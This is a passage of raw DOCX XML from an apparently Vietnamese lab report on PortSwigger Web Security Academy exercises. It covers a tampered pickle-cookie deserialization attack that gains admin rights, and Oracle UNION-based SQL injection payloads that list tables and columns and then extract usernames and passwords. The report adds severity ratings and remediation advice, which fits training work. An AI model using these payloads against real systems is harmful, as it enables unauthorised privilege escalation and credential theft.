        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="001319CD">
        <w:t>sb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F10633" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="001319CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E1980F6" wp14:editId="637546DD">
            <wp:extent cx="6115050" cy="4874895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1145987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87974" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId155"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4874895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3087CF22" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r>
        <w:t xml:space="preserve">Hay chi tiết hơn: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652227D0" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="003705F5" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="003705F5">
        <w:t>b'\x80\x04\x954\x00\x00\x00\x00\x00\x00\x00\x8c\x12introduction.views\x94\x8c\x08TestUser\x94\x93\x94)\x81\x94}\x94\x8c\x05admin\x94K\x00sb.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5E35F2" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00904455">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="252C82E6" wp14:editId="37A679A3">
            <wp:extent cx="6115050" cy="1409065"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1658046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46965" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId156"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1409065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B486785" w14:textId="193BBD73" w:rsidR="00EC0F26" w:rsidRDefault="000B1A1D" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="000B1A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="000B1A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t xml:space="preserve"> Theo như gợi ý từ yêu cầu của lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B834A7" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="002C1B79">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08953204" wp14:editId="5EAC8816">
            <wp:extent cx="6115050" cy="1283970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="566417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17461" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId157"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1283970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC8D49E" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r>
        <w:t xml:space="preserve">Ta thực hiện đổi </w:t>
      </w:r>
      <w:r w:rsidRPr="003705F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>\x00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cuối thành </w:t>
      </w:r>
      <w:r w:rsidRPr="003705F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>\x01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để thực hiện leo quyền lên admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F918518" w14:textId="23DF9449" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r>
        <w:t>Tức là sẽ đổi chuỗi thành:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CABBF6F" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00904455" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00904455">
        <w:t>b'\x80\x04\x954\x00\x00\x00\x00\x00\x00\x00\x8c\x12introduction.views\x94\x8c\x08TestUser\x94\x93\x94)\x81\x94}\x94\x8c\x05admin\x94K\</w:t>
      </w:r>
      <w:r w:rsidRPr="00904455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>x01</w:t>
      </w:r>
      <w:r w:rsidRPr="00904455">
        <w:t>sb.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DBFDBB" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r>
        <w:t>Và decode lại, kết quả là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A1EB3E" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="0088438D" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="0088438D">
        <w:t>b'gASVNAAAAAAAAACMEmludHJvZHVjdGlvbi52aWV3c5SMCFRlc3RVc2VylJOUKYGUfZSMBWFkbWlulEsBc2Iu'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CA6A1D" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="0088438D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BED9C85" wp14:editId="059A5CB5">
            <wp:extent cx="6115050" cy="2266950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1792846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46943" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId158"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2266950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2755A40B" w14:textId="472DCB24" w:rsidR="00EC0F26" w:rsidRDefault="000B1A1D" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="000B1A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="000B1A1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t>hay đổi cookie thành như sau và quan sát kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82F4BE" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="0088438D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DE33CAF" wp14:editId="619BD080">
            <wp:extent cx="6115050" cy="1407160"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="991960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60080" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId159"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1407160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F3E016" w14:textId="0DF8C5AA" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sau đó</w:t>
      </w:r>
      <w:r w:rsidR="000B1A1D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>tải lại trang và thấy đã leo được quyền admin</w:t>
      </w:r>
      <w:r w:rsidR="003705F5">
        <w:t xml:space="preserve"> và thực hiện thử thách thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE87545" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="0088438D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="319AB0EB" wp14:editId="1681E8DC">
            <wp:extent cx="6115050" cy="1158240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="2141165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65069" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId160"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1158240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55785B" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="003705F5" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mức độ ảnh hưởng của lỗ hổng: </w:t>
      </w:r>
      <w:r w:rsidRPr="003705F5">
        <w:t>High (cao) vì lỗ hổng này có thể dẫn đến việc kẻ tấn công leo quyền admin và thực hiện các hành động không được phép trên hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E0ECD3" w14:textId="1BC3D5D7" w:rsidR="008C67B8" w:rsidRPr="003705F5" w:rsidRDefault="00EC0F26" w:rsidP="003705F5">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003705F5">
        <w:t>Cần thiết lập các biện pháp kiểm tra và xác thực cookie được gửi lên từ client trước khi thực hiện deserialization, đồng thời cần kiểm tra và lọc các giá trị được deserialized để ngăn chặn các cuộc tấn công từ việc chỉnh sửa dữ liệu cookie.</w:t>
      </w:r>
      <w:bookmarkStart w:id="71" w:name="_Toc182428925"/>
      <w:bookmarkStart w:id="72" w:name="_Toc182429521"/>
      <w:r w:rsidR="008C67B8" w:rsidRPr="003705F5">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30320793" w14:textId="38A451BF" w:rsidR="00F67FB2" w:rsidRPr="00315F42" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc182909882"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00315F42">
        <w:t>01</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7D45">
        <w:t>: SQL injection attack, listing the database contents on Oracle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="0A5950D2" w14:textId="7E2FCE83" w:rsidR="00F67FB2" w:rsidRDefault="008C67B8" w:rsidP="008C67B8">
      <w:hyperlink r:id="rId161" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F7E4788" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="008C67B8" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00B050BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>Lỗi thiết kế database, có thể sử dụng kĩ thuật SQLi để khai thác database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8AEB92" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B050BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7C1E99" w14:textId="3C1B8C20" w:rsidR="00F67FB2" w:rsidRPr="00E049DC" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:t>ruy cập vào lab và nhận thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAEB644" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00847D03" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="009F7A76">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12D61F4D" wp14:editId="3B7B9701">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1106213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13648" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId162"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3439795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B930AA5" w14:textId="577FEC49" w:rsidR="00F67FB2" w:rsidRPr="00E049DC" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00E049DC">
        <w:t xml:space="preserve">Trang này đang sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00E049DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>filter?category=</w:t>
      </w:r>
      <w:r w:rsidRPr="00E049DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t xml:space="preserve">để mà list các trường header của một trang web. Do vậy, ý tưởng </w:t>
      </w:r>
      <w:r w:rsidR="00BC4913" w:rsidRPr="008C67B8">
        <w:t xml:space="preserve">là sẽ </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>sử dụng kĩ thuật SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030C41C6" w14:textId="7BE48DFE" w:rsidR="00F67FB2" w:rsidRPr="00E049DC" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00E049DC">
        <w:t xml:space="preserve"> Thực hiện chèn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843F6B7" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00E049DC" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C67B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'+UNION+SELECT+table_name,NULL+FROM+all_tables--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325C7D49" w14:textId="400B7518" w:rsidR="00F67FB2" w:rsidRPr="008C67B8" w:rsidRDefault="008C67B8" w:rsidP="008C67B8">
      <w:r w:rsidRPr="008C67B8">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:t>hận thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213F29D6" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="009F7A76">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F5CC687" wp14:editId="7538CF41">
            <wp:extent cx="6115050" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1286716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16076" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId163"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3133725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F34B68C" w14:textId="6C1F52D5" w:rsidR="00F67FB2" w:rsidRPr="00E049DC" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00E049DC">
        <w:t xml:space="preserve">Và dưới cùng có thấy thông tin nhạy cảm là </w:t>
      </w:r>
      <w:r w:rsidRPr="00E049DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>USERS_VWDZIM</w:t>
      </w:r>
      <w:r w:rsidR="008C67B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744BD2BD" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="009F7A76">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F73E2E2" wp14:editId="3BD3ABBA">
            <wp:extent cx="6115050" cy="2888615"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="26768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8624" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId164"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2888615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE095DC" w14:textId="08B9A46D" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:t xml:space="preserve">ạo thêm điều kiện để chiếm được trường </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>USERS_VWDZIM</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:t xml:space="preserve"> này để trích xuất thông tin mà nghĩ là cần thiết như username và password. </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:t>ruy vấn đến user này như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1D817" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00E049DC" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C67B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_VWDZIM'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202BA28E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="008C67B8" w:rsidRDefault="00F67FB2" w:rsidP="008C67B8">
      <w:r w:rsidRPr="008C67B8">
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả trả về như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4507DDE7" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="006130E1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="426FDE2E" wp14:editId="58AB5BDB">
            <wp:extent cx="6115050" cy="3411220"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2027334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34259" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3411220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D8C939" w14:textId="5D4DB25E" w:rsidR="00F67FB2" w:rsidRPr="00E049DC" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00E049DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00E049DC">
        <w:t>iếp tục truy vấn đến 3 trường thông tin này để lấy thông tin như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC7588" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00E049DC" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C67B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'+UNION+SELECT+USERNAME_VMBXGV,+PASSWORD_EDXXSI+FROM+USERS_VWDZIM--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F25DCD7" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="008C67B8" w:rsidRDefault="00F67FB2" w:rsidP="008C67B8">
      <w:r w:rsidRPr="008C67B8">
        <w:t>Kết quả như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A95F673" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00700E23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40EFD5E6" wp14:editId="4BED9D43">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1236490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90294" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId166"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
